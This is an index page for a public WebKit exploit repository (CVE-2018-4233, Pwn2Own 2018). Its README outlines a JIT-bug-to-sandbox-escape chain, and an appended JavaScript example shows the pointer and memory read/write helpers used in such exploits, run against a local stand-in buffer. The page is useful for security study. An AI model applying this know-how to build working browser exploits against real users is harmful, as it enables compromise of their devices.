Ecosyste.ms: Awesome
An open API service indexing awesome lists of open source software.
https://github.com/saelo/cve-2018-4233
Exploit for CVE-2018-4233, a WebKit JIT optimization bug used during Pwn2Own 2018
- Host: GitHub
- URL: https://github.com/saelo/cve-2018-4233
- Owner: saelo
- Created: 2018-08-08T14:41:20.000Z (over 6 years ago)
- Default Branch: master
- Last Pushed: 2018-08-17T23:31:46.000Z (over 6 years ago)
- Last Synced: 2023-11-07T17:04:37.104Z (about 1 year ago)
- Language: JavaScript
- Size: 10.7 KB
- Stars: 174
- Watchers: 12
- Forks: 33
- Open Issues: 0
Metadata Files:
- Readme: README.md
README
# CVE-2018-4233
Exploit for CVE-2018-4233, a bug in the JIT compiler of WebKit. Tested on Safari 11.0.3 on macOS 10.13.3.
For more details see https://saelo.github.io/presentations/blackhat_us_18_attacking_client_side_jit_compilers.pdf
The exploit first turns the JIT bug into the addrof and fakeobj primitives, then uses them to fake a typed array, which yields arbitrary memory read/write, following the construction described in http://www.phrack.org/papers/attacking_javascript_engines.html. With that primitive it locates the JIT page of the renderer process and writes the stage 1 shellcode there. Stage 1 in turn writes a .dylib (contained in stage2.js) to disk and loads it into the renderer process to perform a sandbox escape.

Stage 2 relies on a separate vulnerability to break out of the Safari sandbox and will be published at a later point.
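The following is an added example, not code from saelo's repository, showing the helper layer that sits between the addrof/fakeobj primitives and the arbitrary read/write described above: reinterpreting doubles as raw 64-bit values (the only way JavaScript code can handle pointers read out of object slots), packing 64-bit fields for a fake object into an array of doubles, and wrapping byte-level access into 64-bit reads and writes. Two assumptions are labelled in the code: the byte-level `read8`/`write8` primitives stand in for the faked typed array and are backed here by a plain `ArrayBuffer` so the file runs offline under Node, and the `makeFakeMemory` base address is arbitrary. The NaN check reflects a real JSC caveat: doubles stored into a double array are canonicalised, so a field whose bit pattern is a NaN cannot be placed through this route.

```javascript
// Added example (not part of saelo/cve-2018-4233): helpers of the kind a
// WebKit exploit needs once addrof/fakeobj exist.

const f64 = new Float64Array(1);
const u64 = new BigUint64Array(f64.buffer);

// Reinterpret a JS double as its raw IEEE-754 bit pattern (a BigInt).
function doubleToBits(d) {
  f64[0] = d;
  return u64[0];
}

// Reinterpret a 64-bit pattern as the JS double carrying those bits.
function bitsToDouble(bits) {
  u64[0] = BigInt.asUintN(64, bits);
  return f64[0];
}

function hex(bits) {
  return '0x' + BigInt.asUintN(64, bits).toString(16).padStart(16, '0');
}

// A pattern is a NaN when the exponent is all ones and the mantissa is
// non-zero. JSC canonicalises NaNs on store into double arrays, so such a
// field would not survive being staged through a JS array of doubles.
function isNaNBits(bits) {
  const b = BigInt.asUintN(64, bits);
  return (b & 0x7ff0000000000000n) === 0x7ff0000000000000n &&
         (b & 0x000fffffffffffffn) !== 0n;
}

// Lay out 64-bit fields (e.g. a fake cell header followed by its slots) as
// doubles, so that storing them into a JS array of doubles places the raw
// bits contiguously in memory. Rejects fields that would be canonicalised.
function packFakeObject(fields) {
  return fields.map((f, i) => {
    if (isNaNBits(f)) {
      throw new Error(`field ${i} (${hex(f)}) is a NaN pattern and would be canonicalised`);
    }
    return bitsToDouble(f);
  });
}

// 64-bit read/write built on byte-level primitives. In the real exploit
// read8/write8 come from the faked typed array; here (assumption) they are
// closures over an ArrayBuffer standing in for process memory.
class Memory {
  constructor(read8, write8) {
    this.read8 = read8;
    this.write8 = write8;
  }
  read64(addr) {                      // little-endian, as on x86-64
    let v = 0n;
    for (let i = 7; i >= 0; i--) v = (v << 8n) | BigInt(this.read8(addr + BigInt(i)));
    return v;
  }
  write64(addr, value) {
    let v = BigInt.asUintN(64, value);
    for (let i = 0; i < 8; i++) {
      this.write8(addr + BigInt(i), Number(v & 0xffn));
      v >>= 8n;
    }
  }
  readDouble(addr) { return bitsToDouble(this.read64(addr)); }
}

// Constructed stand-in for process memory: a small buffer pretending to
// start at `base` (arbitrary, assumption). Out-of-range access throws, the
// way a real exploit should check addresses before touching them.
function makeFakeMemory(base = 0x100000000n, size = 4096) {
  const backing = new Uint8Array(size);
  const idx = (addr) => {
    const off = addr - base;
    if (off < 0n || off >= BigInt(size)) {
      throw new RangeError(`address ${hex(addr)} outside stand-in region`);
    }
    return Number(off);
  };
  return new Memory((a) => backing[idx(a)], (a, v) => { backing[idx(a)] = v; });
}

// Usage: stage two fields as doubles, write a 64-bit value, read it back.
const packed = packFakeObject([0x0123456789abcdefn, 0n]);
const mem = makeFakeMemory();
mem.write64(0x100000010n, 0xdeadbeefcafebaben);
console.log(hex(doubleToBits(packed[0])), hex(mem.read64(0x100000010n)));
```

In a real chain the `Memory` primitives are replaced by element accesses on the faked typed array, and every pointer that comes back from the engine arrives as a double that must be passed through `doubleToBits` before any arithmetic.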